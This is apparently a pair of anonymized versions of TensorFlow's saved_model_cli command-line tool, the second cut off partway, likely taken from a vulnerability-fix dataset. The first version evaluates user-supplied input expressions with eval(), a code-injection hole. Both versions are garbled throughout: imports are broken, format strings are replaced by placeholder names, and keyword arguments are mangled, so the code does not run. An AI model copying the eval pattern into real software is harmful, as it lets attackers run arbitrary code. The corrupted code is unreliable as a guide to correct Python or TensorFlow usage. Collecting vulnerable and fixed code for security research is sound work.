import argparse
import os
import re
import .sys
from absl import app # pylint: disable=unused-import
import numpy as np
import .six
from tensorflow.core.example import .example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import .session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import .meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import .save
from tensorflow.python.saved_model import .signature_constants
from tensorflow.python.tools import .saved_model_aot_compile
from tensorflow.python.tools import .saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
VAR_0 = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
VAR_1 = set(['WriteFile', 'ReadFile', 'PrintV2'])
def FUNC_0(VAR_2):
VAR_22 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
print('The given SavedModel contains the following tag-sets:')
for VAR_3 in sorted(VAR_22):
print('%r' % ', '.join(sorted(VAR_3)))
def FUNC_1(VAR_2, VAR_3):
VAR_23 = FUNC_10(VAR_2, VAR_3)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for VAR_5 in sorted(VAR_23.keys()):
print('SignatureDef key: \"%VAR_27\"' % VAR_5)
def FUNC_2(VAR_4,
VAR_5):
if VAR_5 not in VAR_4.signature_def:
raise ValueError(
f'Could not find signature "{VAR_5}". Please choose from: '
f'{", ".join(VAR_4.signature_def.keys())}')
return VAR_4.signature_def[VAR_5].inputs
def FUNC_3(VAR_4,
VAR_5):
return VAR_4.signature_def[VAR_5].outputs
def FUNC_4(VAR_2, VAR_3, VAR_5, VAR_6=0):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_24 = FUNC_2(
VAR_4, VAR_5)
VAR_25 = FUNC_3(
VAR_4, VAR_5)
VAR_26 = ' ' * VAR_6
def FUNC_30(VAR_27):
print(VAR_26 + VAR_27)
FUNC_30('The given SavedModel SignatureDef contains the following input(VAR_27):')
for VAR_68, input_tensor in sorted(VAR_24.items()):
FUNC_30(' VAR_43[\'%VAR_27\'] VAR_9:' % VAR_68)
FUNC_7(input_tensor, VAR_6+1)
FUNC_30('The given SavedModel SignatureDef contains the following '
'output(VAR_27):')
for output_key, output_tensor in sorted(VAR_25.items()):
FUNC_30(' VAR_66[\'%VAR_27\'] VAR_9:' % output_key)
FUNC_7(output_tensor, VAR_6+1)
FUNC_30('Method name is: %s' %
VAR_4.signature_def[VAR_5].method_name)
def FUNC_5(VAR_2):
VAR_28 = saved_model_utils.read_saved_model(VAR_2).meta_graphs
VAR_29 = False
for VAR_4 in VAR_28:
VAR_29 |= VAR_4.HasField('object_graph_def')
if not VAR_29:
return
with ops_lib.Graph().as_default():
VAR_61 = load.load(VAR_2)
print('\nDefined Functions:', VAR_32='')
VAR_30 = (
save._AugmentedGraphView(VAR_61) # pylint: disable=protected-access
.list_functions(VAR_61))
VAR_30 = sorted(VAR_30.items(), key=lambda x: x[0])
for name, function in VAR_30:
print('\n Function Name: \'%VAR_27\'' % name)
VAR_62 = []
if isinstance(function, defun.ConcreteFunction):
VAR_62.append(function)
if isinstance(function, def_function.Function):
VAR_62.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
VAR_62 = sorted(VAR_62, key=lambda x: x.name)
for index, concrete_function in enumerate(VAR_62, 1):
VAR_20, VAR_76 = None, None
if concrete_function.structured_input_signature:
VAR_20, VAR_76 = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
VAR_20 = concrete_function._arg_keywords # pylint: disable=protected-access
if VAR_20:
print(' Option #%d' % index)
print(' Callable with:')
FUNC_6(VAR_20, VAR_6=4)
if VAR_76:
FUNC_6(VAR_76, 'Named Argument', VAR_6=4)
def FUNC_6(VAR_7, VAR_8='Argument', VAR_6=0):
VAR_26 = ' ' * VAR_6
def FUNC_31(VAR_31):
VAR_63 = '\'' * isinstance(VAR_31, str)
return VAR_63 + str(VAR_31) + VAR_63
def FUNC_30(VAR_27, VAR_32='\n'):
print(VAR_26 + VAR_27, VAR_32=end)
for index, element in enumerate(VAR_7, 1):
if VAR_6 == 4:
FUNC_30('%VAR_27 #%d' % (VAR_8, index))
if isinstance(element, six.string_types):
FUNC_30(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((VAR_6 + 1) * ' ' + '%VAR_27: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: [', VAR_32='')
for VAR_31 in element:
print('%s' % FUNC_31(VAR_31), VAR_32=', ')
print('\b\b]')
elif isinstance(element, dict):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: {', VAR_32='')
for (key, VAR_31) in element.items():
print('\'%VAR_27\': %s' % (str(key), FUNC_31(VAR_31)), VAR_32=', ')
print('\b\b}')
else:
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: %s' % str(element))
def FUNC_7(VAR_9, VAR_6=0):
VAR_26 = ' ' * VAR_6
def FUNC_30(VAR_27):
print(VAR_26 + VAR_27)
FUNC_30(' dtype: ' +
{VAR_31: key
for (key, VAR_31) in types_pb2.DataType.items()}[VAR_9.dtype])
if VAR_9.tensor_shape.unknown_rank:
VAR_64 = 'unknown_rank'
else:
VAR_65 = [str(dim.size) for dim in VAR_9.tensor_shape.dim]
VAR_64 = ', '.join(VAR_65)
VAR_64 = '(' + VAR_64 + ')'
FUNC_30(' VAR_64: ' + VAR_64)
FUNC_30(' name: ' + VAR_9.name)
def FUNC_8(VAR_2):
VAR_22 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
for VAR_3 in sorted(VAR_22):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(VAR_3))
VAR_3 = ','.join(VAR_3)
VAR_23 = FUNC_10(VAR_2, VAR_3)
for VAR_5 in sorted(VAR_23.keys()):
print('\nsignature_def[\'' + VAR_5 + '\']:')
FUNC_4(VAR_2, VAR_3, VAR_5,
VAR_6=1)
FUNC_5(VAR_2)
def FUNC_9(VAR_2, VAR_3):
return saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
def FUNC_10(VAR_2, VAR_3):
VAR_33 = saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
return VAR_33.signature_def
def FUNC_11(VAR_4):
VAR_34 = set(
meta_graph_lib.ops_used_by_graph_def(VAR_4.graph_def))
VAR_35 = VAR_1 & VAR_34
if VAR_35:
print(
'MetaGraph with tag set %VAR_27 contains the following denylisted ops:' %
VAR_4.meta_info_def.tags, VAR_35)
else:
print('MetaGraph with tag set %VAR_27 does not contain denylisted ops.' %
VAR_4.meta_info_def.tags)
def FUNC_12(VAR_2, VAR_3, VAR_5,
VAR_10, VAR_11,
VAR_12, VAR_13=None, VAR_14=False,
VAR_15=False):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_24 = FUNC_2(
VAR_4, VAR_5)
for input_key_name in VAR_10.keys():
if input_key_name not in VAR_24:
raise ValueError(
'"%s" is not a valid input key. Please choose from %VAR_27, or use '
'--FUNC_18 option.' %
(input_key_name, '"' + '", "'.join(VAR_24.keys()) + '"'))
VAR_36 = {
VAR_24[key].name: tensor
for key, tensor in VAR_10.items()
}
VAR_25 = FUNC_3(
VAR_4, VAR_5)
VAR_37 = sorted(VAR_25.keys())
VAR_38 = [
VAR_25[tensor_key].name
for tensor_key in VAR_37
]
with session.Session(VAR_13, graph=ops_lib.Graph()) as VAR_77:
if VAR_14:
print('Initializing TPU System ...')
VAR_77.run(tpu.initialize_system())
loader.load(VAR_77, VAR_3.split(','), VAR_2)
if VAR_15:
VAR_77 = local_cli_wrapper.LocalCLIDebugWrapperSession(VAR_77)
VAR_66 = VAR_77.run(VAR_38, feed_dict=VAR_36)
for i, output in enumerate(VAR_66):
VAR_78 = VAR_37[i]
print('Result for output key %VAR_27:\n%s' % (VAR_78, output))
if VAR_11:
if not os.path.isdir(VAR_11):
os.makedirs(VAR_11)
VAR_79 = os.path.join(VAR_11, VAR_78 + '.npy')
if not VAR_12 and os.path.exists(VAR_79):
raise RuntimeError(
'Output file %VAR_27 already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % VAR_79)
np.save(VAR_79, output)
print('Output %VAR_27 is saved to %s' % (VAR_78,
VAR_79))
def FUNC_13(VAR_16):
VAR_39 = {}
VAR_40 = VAR_16.split(';')
for input_raw in filter(bool, VAR_40): # skip empty strings
VAR_67 = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if VAR_67:
VAR_39[VAR_67.group(1)] = VAR_67.group(2), VAR_67.group(3)
else:
VAR_67 = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if VAR_67:
VAR_39[VAR_67.group(1)] = VAR_67.group(2), None
else:
raise RuntimeError(
'--VAR_43 "%s" format is incorrect. Please follow'
'"<VAR_68>=<filename>", or'
'"<VAR_68>=<filename>[<variable_name>]"' % input_raw)
return VAR_39
def FUNC_14(VAR_17):
VAR_39 = {}
for input_raw in filter(bool, VAR_17.split(';')):
if '=' not in VAR_17:
raise RuntimeError('--VAR_44 "%s" format is incorrect. Please follow'
'"<VAR_68>=<python expression>"' % VAR_17)
VAR_68, VAR_69 = input_raw.split('=', 1)
VAR_39[VAR_68] = eval(VAR_69) # pylint: disable=eval-used
return VAR_39
def FUNC_15(VAR_18):
VAR_39 = FUNC_14(VAR_18)
for VAR_68, example_list in VAR_39.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
VAR_39[VAR_68] = [
FUNC_16(VAR_41) for VAR_41 in example_list
]
return VAR_39
def FUNC_16(VAR_19):
VAR_41 = example_pb2.Example()
for feature_name, feature_list in VAR_19.items():
if not isinstance(feature_list, list):
raise ValueError('feature VAR_31 must be a list, but %VAR_27: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
VAR_41.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
VAR_41.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
VAR_41.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
VAR_41.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %VAR_27 for VAR_31 %VAR_27 is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return VAR_41.SerializeToString()
def FUNC_17(VAR_16, VAR_17,
VAR_18):
VAR_42 = {}
VAR_43 = FUNC_13(VAR_16)
VAR_44 = FUNC_14(VAR_17)
VAR_45 = FUNC_15(VAR_18)
for VAR_71, (filename, variable_name) in VAR_43.items():
VAR_70 = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
if variable_name:
if isinstance(VAR_70, np.ndarray):
logging.warn(
'Input file %VAR_27 contains a single ndarray. Name key \"%VAR_27\" ignored.'
% (filename, variable_name))
VAR_42[VAR_71] = VAR_70
else:
if variable_name in VAR_70:
VAR_42[VAR_71] = VAR_70[variable_name]
else:
raise RuntimeError(
'Input file %VAR_27 does not contain variable with name \"%VAR_27\".' %
(filename, variable_name))
else:
if isinstance(VAR_70, np.lib.npyio.NpzFile):
VAR_80 = VAR_70.files
if len(VAR_80) != 1:
raise RuntimeError(
'Input file %VAR_27 contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
VAR_42[VAR_71] = VAR_70[VAR_80[0]]
else:
VAR_42[VAR_71] = VAR_70
for VAR_71, py_expr_evaluated in VAR_44.items():
if VAR_71 in VAR_42:
logging.warn(
'input_key %VAR_27 has been specified with both --VAR_43 and --input_exprs'
' options. Value in --VAR_44 will be used.' % VAR_71)
VAR_42[VAR_71] = py_expr_evaluated
for VAR_71, VAR_41 in VAR_45.items():
if VAR_71 in VAR_42:
logging.warn(
'input_key %VAR_27 has been specified in multiple options. Value in '
'--VAR_45 will be used.' % VAR_71)
VAR_42[VAR_71] = VAR_41
return VAR_42
def FUNC_18(VAR_20):
if VAR_20.all:
FUNC_8(VAR_20.dir)
else:
if VAR_20.tag_set is None:
FUNC_0(VAR_20.dir)
else:
if VAR_20.signature_def is None:
FUNC_1(VAR_20.dir, VAR_20.tag_set)
else:
FUNC_4(VAR_20.dir, VAR_20.tag_set, VAR_20.signature_def)
def FUNC_19(VAR_20):
if not VAR_20.inputs and not VAR_20.input_exprs and not VAR_20.input_examples:
raise AttributeError(
'At least one of --VAR_43, --VAR_44 or --VAR_45 must be '
'required')
VAR_42 = FUNC_17(
VAR_20.inputs, VAR_20.input_exprs, VAR_20.input_examples)
FUNC_12(VAR_20.dir, VAR_20.tag_set, VAR_20.signature_def,
VAR_42, VAR_20.outdir,
VAR_20.overwrite, VAR_13=VAR_20.worker,
VAR_14=VAR_20.init_tpu, VAR_15=VAR_20.tf_debug)
def FUNC_20(VAR_20):
if VAR_20.tag_set:
FUNC_11(
saved_model_utils.get_meta_graph_def(VAR_20.dir, VAR_20.tag_set))
else:
VAR_72 = saved_model_utils.read_saved_model(VAR_20.dir)
for VAR_4 in VAR_72.meta_graphs:
FUNC_11(VAR_4)
def FUNC_21(VAR_20):
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not VAR_20.convert_tf1_model:
VAR_73 = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=VAR_20.max_workspace_size_bytes,
precision_mode=VAR_20.precision_mode,
minimum_segment_size=VAR_20.minimum_segment_size)
VAR_74 = trt.TrtGraphConverterV2(
input_saved_model_dir=VAR_20.dir,
input_saved_model_tags=VAR_20.tag_set.split(','),
conversion_params=VAR_73)
try:
VAR_74.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
VAR_74.save(output_saved_model_dir=VAR_20.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=VAR_20.max_workspace_size_bytes,
precision_mode=VAR_20.precision_mode,
minimum_segment_size=VAR_20.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=VAR_20.dir,
input_saved_model_tags=VAR_20.tag_set.split(','),
output_saved_model_dir=VAR_20.output_dir)
def FUNC_22(VAR_20):
VAR_46 = (
VAR_20.checkpoint_path
or os.path.join(VAR_20.dir, 'variables/variables'))
if not VAR_20.variables_to_feed:
VAR_75 = []
elif VAR_20.variables_to_feed.lower() == 'all':
VAR_75 = None # We will identify them after.
else:
VAR_75 = VAR_20.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
VAR_46=checkpoint_path,
VAR_4=saved_model_utils.get_meta_graph_def(
VAR_20.dir, VAR_20.tag_set),
VAR_5=VAR_20.signature_def_key,
VAR_75=variables_to_feed,
output_prefix=VAR_20.output_prefix,
target_triple=VAR_20.target_triple,
target_cpu=VAR_20.target_cpu,
cpp_class=VAR_20.cpp_class,
multithreading=VAR_20.multithreading.lower() not in ('f', 'false', '0'))
def FUNC_23(VAR_21):
VAR_47 = (
'Usage examples:\n'
'To FUNC_18 all tag-sets in a SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72\n\n'
'To FUNC_18 all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve,gpu\n\n'
'To FUNC_18 all VAR_43 and VAR_66 TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve'
' --signature_def serving_default\n\n'
'To FUNC_18 all available information in the SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --all')
VAR_48 = VAR_21.add_parser(
'show',
description=VAR_47,
formatter_class=argparse.RawTextHelpFormatter)
VAR_48.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
VAR_48.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
VAR_48.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to FUNC_18, separated by \',\'')
VAR_48.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(VAR_27) and output(VAR_27) for')
VAR_48.set_defaults(func=FUNC_18)
def FUNC_24(VAR_21):
VAR_49 = ('Usage VAR_41:\n'
'To FUNC_19 input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve \\\n'
' --signature_def serving_default \\\n'
' --VAR_43 input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --VAR_44 \'input3_key=np.ones(2)\' \\\n'
' --VAR_45 '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --VAR_11=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
VAR_50 = VAR_21.add_parser(
'run', description=VAR_49, formatter_class=argparse.RawTextHelpFormatter)
VAR_50.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_50.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
VAR_50.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
VAR_51 = ('Loading VAR_43 from files, in the format of \'<VAR_68>=<filename>,'
' or \'<VAR_68>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
VAR_50.add_argument('--inputs', type=str, default='', help=VAR_51)
VAR_51 = ('Specifying VAR_43 by python expressions, in the format of'
' "<VAR_68>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. '
'Will override duplicate input keys from --VAR_43 option.')
VAR_50.add_argument('--input_exprs', type=str, default='', help=VAR_51)
VAR_51 = (
'Specifying tf.Example VAR_43 as list of dictionaries. For VAR_41: '
'<VAR_68>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --VAR_43 '
'and --VAR_44 option.')
VAR_50.add_argument('--input_examples', type=str, default='', help=VAR_51)
VAR_50.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(VAR_27) will be saved to given directory')
VAR_50.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
VAR_50.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
VAR_50.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be FUNC_19 on the VAR_13. '
'Valid VAR_13 specification is a bns or gRPC path.')
VAR_50.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the VAR_13 is a TPU job.')
VAR_50.set_defaults(func=FUNC_19)
def FUNC_25(VAR_21):
VAR_52 = ('Usage VAR_41:\n'
'To FUNC_20 for denylisted ops in SavedModel:\n'
'$saved_model_cli FUNC_20 --dir /tmp/VAR_72\n'
'To FUNC_20 a specific MetaGraph, pass in --VAR_3\n')
VAR_53 = VAR_21.add_parser(
'scan',
description=VAR_52,
formatter_class=argparse.RawTextHelpFormatter)
VAR_53.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_53.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to FUNC_20, separated by \',\'')
VAR_53.set_defaults(func=FUNC_20)
def FUNC_26(VAR_21):
VAR_54 = ('Usage VAR_41:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/VAR_72 \\\n'
' --VAR_3 serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
VAR_55 = VAR_21.add_parser(
'convert',
description=VAR_54,
formatter_class=argparse.RawTextHelpFormatter)
VAR_55.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_55.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
VAR_55.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_56 = VAR_55.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to FUNC_19 with the SavedModel')
VAR_57 = VAR_56.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
VAR_57.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
VAR_57.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
VAR_57.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
VAR_57.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
VAR_57.set_defaults(func=FUNC_21)
def FUNC_27(VAR_21):
VAR_58 = '\n'.join(
['Usage VAR_41:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli FUNC_22 \\',
' --dir /tmp/VAR_72 \\',
' --VAR_3 serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(VAR_0),
'',
'For VAR_41, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
VAR_59 = VAR_21.add_parser(
'aot_compile_cpu',
description=VAR_58,
formatter_class=argparse.RawTextHelpFormatter)
VAR_59.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_59.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(VAR_27) '
'and object file(VAR_27)'))
VAR_59.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_59.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
VAR_59.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
VAR_59.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, FUNC_19 (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
VAR_59.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
VAR_59.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(VAR_27), or if no '
'namespaces are given, within the global namespace.'))
VAR_59.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `VAR_75` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input VAR_7 from the signature as '
'well).'))
VAR_59.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
VAR_59.set_defaults(func=FUNC_22)
def FUNC_28():
VAR_60 = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
VAR_60.add_argument('-v', '--version', action='version', version='0.1.0')
VAR_21 = VAR_60.add_subparsers(
title='commands', description='valid commands', help='additional help')
FUNC_23(VAR_21)
FUNC_24(VAR_21)
FUNC_25(VAR_21)
FUNC_26(VAR_21)
FUNC_27(VAR_21)
return VAR_60
def FUNC_29():
logging.set_verbosity(logging.INFO)
VAR_60 = FUNC_28()
VAR_20 = VAR_60.parse_args()
if not hasattr(VAR_20, 'func'):
VAR_60.error('too few arguments')
VAR_20.func(VAR_20)
if __name__ == '__main__':
sys.exit(FUNC_29())
|
import argparse
import ast
import os
import re
import .sys
from absl import app # pylint: disable=unused-import
import numpy as np
import .six
from tensorflow.core.example import .example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import .session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import .meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import .save
from tensorflow.python.saved_model import .signature_constants
from tensorflow.python.tools import .saved_model_aot_compile
from tensorflow.python.tools import .saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
VAR_0 = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
VAR_1 = set(['WriteFile', 'ReadFile', 'PrintV2'])
def FUNC_0(VAR_2):
VAR_23 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
print('The given SavedModel contains the following tag-sets:')
for VAR_3 in sorted(VAR_23):
print('%r' % ', '.join(sorted(VAR_3)))
def FUNC_1(VAR_2, VAR_3):
VAR_24 = FUNC_10(VAR_2, VAR_3)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for VAR_5 in sorted(VAR_24.keys()):
print('SignatureDef key: \"%VAR_28\"' % VAR_5)
def FUNC_2(VAR_4,
VAR_5):
if VAR_5 not in VAR_4.signature_def:
raise ValueError(
f'Could not find signature "{VAR_5}". Please choose from: '
f'{", ".join(VAR_4.signature_def.keys())}')
return VAR_4.signature_def[VAR_5].inputs
def FUNC_3(VAR_4,
VAR_5):
return VAR_4.signature_def[VAR_5].outputs
def FUNC_4(VAR_2, VAR_3, VAR_5, VAR_6=0):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_25 = FUNC_2(
VAR_4, VAR_5)
VAR_26 = FUNC_3(
VAR_4, VAR_5)
VAR_27 = ' ' * VAR_6
def FUNC_30(VAR_28):
print(VAR_27 + VAR_28)
FUNC_30('The given SavedModel SignatureDef contains the following input(VAR_28):')
for VAR_69, input_tensor in sorted(VAR_25.items()):
FUNC_30(' VAR_44[\'%VAR_28\'] VAR_9:' % VAR_69)
FUNC_7(input_tensor, VAR_6+1)
FUNC_30('The given SavedModel SignatureDef contains the following '
'output(VAR_28):')
for output_key, output_tensor in sorted(VAR_26.items()):
FUNC_30(' VAR_67[\'%VAR_28\'] VAR_9:' % output_key)
FUNC_7(output_tensor, VAR_6+1)
FUNC_30('Method name is: %s' %
VAR_4.signature_def[VAR_5].method_name)
def FUNC_5(VAR_2):
VAR_29 = saved_model_utils.read_saved_model(VAR_2).meta_graphs
VAR_30 = False
for VAR_4 in VAR_29:
VAR_30 |= VAR_4.HasField('object_graph_def')
if not VAR_30:
return
with ops_lib.Graph().as_default():
VAR_62 = load.load(VAR_2)
print('\nDefined Functions:', VAR_33='')
VAR_31 = (
save._AugmentedGraphView(VAR_62) # pylint: disable=protected-access
.list_functions(VAR_62))
VAR_31 = sorted(VAR_31.items(), key=lambda x: x[0])
for name, function in VAR_31:
print('\n Function Name: \'%VAR_28\'' % name)
VAR_63 = []
if isinstance(function, defun.ConcreteFunction):
VAR_63.append(function)
if isinstance(function, def_function.Function):
VAR_63.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
VAR_63 = sorted(VAR_63, key=lambda x: x.name)
for index, concrete_function in enumerate(VAR_63, 1):
VAR_21, VAR_77 = None, None
if concrete_function.structured_input_signature:
VAR_21, VAR_77 = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
VAR_21 = concrete_function._arg_keywords # pylint: disable=protected-access
if VAR_21:
print(' Option #%d' % index)
print(' Callable with:')
FUNC_6(VAR_21, VAR_6=4)
if VAR_77:
